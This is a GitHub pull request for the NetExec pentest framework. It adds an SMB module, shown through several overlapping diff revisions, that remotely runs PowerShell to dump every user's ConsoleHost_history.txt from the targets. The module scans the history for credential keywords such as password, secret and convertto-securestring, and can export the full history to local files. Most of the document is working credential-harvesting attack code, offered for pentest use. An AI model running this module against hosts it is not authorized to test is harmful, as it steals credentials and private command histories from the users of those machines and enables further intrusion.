### PR TITLE
Add new SMB module to get the PowerShell history on all the users

### DIFF
--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -20,7 +20,7 @@ class NXCModule:
     def analyze_history(self, history):
         """Analyze PowerShell history for sensitive information."""
         sensitive_keywords = [
-            "password", "passwd", "secret", "credential", "key",
+            "password", "passwd", "passw", "secret", "credential", "key",
             "get-credential", "convertto-securestring", "set-localuser",
             "new-localuser", "set-adaccountpassword", "new-object system.net.webclient",
             "invoke-webrequest", "invoke-restmethod"

--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -1,0 +1,70 @@
+import traceback
+from impacket.examples.secretsdump import RemoteOperations
+
+class NXCModule:
+    """Module by @357384n"""
+
+    name = "powershell_history"
+    description = "Extracts PowerShell history for all users and looks for sensitive commands."
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        """Define module options."""
+        pass
+
+    def execute_command(self, connection, command):
+        """Execute a command on the remote system and return the output."""
+        output = connection.execute(command, True)
+        return output
+
+    def get_powershell_history(self, connection):
+        """Get the PowerShell history for all users."""
+        history_paths_command = 'powershell.exe "type C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"'
+        try:
+            history_output = self.execute_command(connection, history_paths_command)
+            return history_output.split('\n')
+        except Exception as e:
+            raise Exception(f"Could not retrieve PowerShell history: {e}")
+
+    def analyze_history(self, history):
+        """Analyze PowerShell history for sensitive information."""
+        sensitive_keywords = [
+            "password", "passwd", "secret", "credential", "key",
+            "get-credential", "convertto-securestring", "set-localuser",
+            "new-localuser", "set-adaccountpassword", "new-object system.net.webclient",
+            "invoke-webrequest", "invoke-restmethod"
+        ]
+        sensitive_commands = []
+        for command in history:
+            command_lower = command.lower()
+            if any(keyword.lower() in command_lower for keyword in sensitive_keywords):
+                sensitive_commands.append(command.strip())
+        return sensitive_commands
+
+    def on_admin_login(self, context, connection):
+        """Main function to retrieve and analyze PowerShell history."""
+        try:
+            context.log.info("Retrieving PowerShell history...")
+            history = self.get_powershell_history(connection)
+            if history:
+                sensitive_commands = self.analyze_history(history)
+                if sensitive_commands:
+                    context.log.highlight("Sensitive commands found in PowerShell history:")
+                    for command in sensitive_commands:
+                        context.log.highlight(f"  {command}")
+                else:
+                    context.log.info("No sensitive commands found in PowerShell history.")
+            else:
+                context.log.info("No PowerShell history found.")
+            
+            # Write history to file in current directory
+            with open("powershell_history.txt", "w") as file:
+                for cmd in history:
+                    file.write(cmd + "\n")
+            print("History written to powershell_history.txt")
+
+        except Exception as e:
+            context.log.fail(f"UNEXPECTED ERROR: {e}")
+            context.log.debug(traceback.format_exc())

--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -1,6 +1,6 @@
 import traceback
 import os
-from impacket.examples.secretsdump import RemoteOperations
+
 
 class NXCModule:
     """Module by @357384n"""
@@ -14,22 +14,8 @@ class NXCModule:
     def options(self, context, module_options):
         """To export all the history you can add the following option: -o export=enable"""
         context.log.info(f"Received module options: {module_options}")
-        self.export = module_options.get('EXPORT', 'disable').lower()
+        self.export = module_options.get("EXPORT", "disable").lower()
         context.log.info(f"Option export set to: {self.export}")
-
-    def execute_command(self, connection, command):
-        """Execute a command on the remote system and return the output."""
-        output = connection.execute(command, True)
-        return output
-
-    def get_powershell_history(self, connection):
-        """Get the PowerShell history for all users."""
-        history_paths_command = 'powershell.exe "type C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"'
-        try:
-            history_output = self.execute_command(connection, history_paths_command)
-            return history_output.split('\n')
-        except Exception as e:
-            raise Exception(f"Could not retrieve PowerShell history: {e}")
 
     def analyze_history(self, history):
         """Analyze PowerShell history for sensitive information."""
@@ -50,7 +36,8 @@ class NXCModule:
         """Main function to retrieve and analyze PowerShell history."""
         try:
             context.log.info("Retrieving PowerShell history...")
-            history = self.get_powershell_history(connection)
+            command = 'powershell.exe "type C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"'
+            history = connection.execute(command, True).split("\n")
             if history:
                 sensitive_commands = self.analyze_history(history)
                 if sensitive_commands:
@@ -64,7 +51,7 @@ class NXCModule:
 
             # Check if export is enabled
             context.log.info(f"Export option is set to: {self.export}")
-            if self.export == 'enable':
+            if self.export == "enable":
                 host = connection.host  # Assuming 'host' contains the target IP or hostname
                 filename = f"{host}.powershell_history.txt"
                 context.log.info(f"Export enabled, writing history to {filename}")

--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -1,4 +1,5 @@
 import traceback
+import os
 from impacket.examples.secretsdump import RemoteOperations
 
 class NXCModule:
@@ -11,7 +12,7 @@ class NXCModule:
     multiple_hosts = True
 
     def options(self, context, module_options):
-        """Define module options."""
+        """To export all the history you can add the following option: -o export=enable"""
         context.log.info(f"Received module options: {module_options}")
         self.export = module_options.get('EXPORT', 'disable').lower()
         context.log.info(f"Option export set to: {self.export}")

--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -53,7 +53,7 @@ class NXCModule:
 
             # Check if export is enabled
             context.log.info(f"Export option is set to: {self.export}")
-            if self.export:
+            if self.export and history:
                 host = connection.host  # Assuming 'host' contains the target IP or hostname
                 filename = f"{host}_powershell_history.txt"
                 export_path = join(NXC_PATH, "modules", "powershell_history")
@@ -68,7 +68,6 @@ class NXCModule:
                     context.log.highlight(f"PowerShell history written to: {path}")
                 except Exception as e:
                     context.log.fail(f"Failed to write history to {filename}: {e}")
-
         except Exception as e:
             context.log.fail(f"UNEXPECTED ERROR: {e}")
             context.log.debug(traceback.format_exc())

--- a/nxc/modules/powershell_history.py
+++ b/nxc/modules/powershell_history.py
@@ -11,7 +11,7 @@ class NXCModule:
     multiple_hosts = True
 
     def options(self, context, module_options):
-        """Export all the history with -o export=enable"""
+        """Define module options."""
         context.log.info(f"Received module options: {module_options}")
         self.export = module_options.get('EXPORT', 'disable').lower()
         context.log.info(f"Option export set to: {self.export}")
@@ -36,7 +36,7 @@ class NXCModule:
             "password", "passwd", "secret", "credential", "key",
             "get-credential", "convertto-securestring", "set-localuser",
             "new-localuser", "set-adaccountpassword", "new-object system.net.webclient",
-            "invoke-webrequest", "invoke-restmethod", "pass"
+            "invoke-webrequest", "invoke-restmethod"
         ]
         sensitive_commands = []
         for command in history:
@@ -72,6 +72,9 @@ class NXCModule:
                         for cmd in history:
                             file.write(cmd + "\n")
                     context.log.info(f"History written to {filename}")
+                    # Print the full path to the file
+                    full_path = os.path.abspath(filename)
+                    print(f"PowerShell history written to: {full_path}")
                 except Exception as e:
                     context.log.fail(f"Failed to write history to {filename}: {e}")
 


### PR DESCRIPTION
Hey,

I've added a pretty basic module to get the Powershell History of all the users on specified targets. Once get it the module will check some keywords that could contain credentials and display them.
You also can export the entire Powershell History with the following option: -o export=enable. 
If you do that a file like {IP}.powershell_history.txt will be writen in your current path.

Running the module:
![image](https://github.com/Pennyw0rth/NetExec/assets/43112303/17f312b0-ad99-411f-9fac-d2b97c91edf8)

By default the export option is disable but can be very interesting during a pentest so if you want to manually analyze them juste do like below:

![image](https://github.com/Pennyw0rth/NetExec/assets/43112303/160ab38f-e44c-4ec5-8495-5234abdcac03)
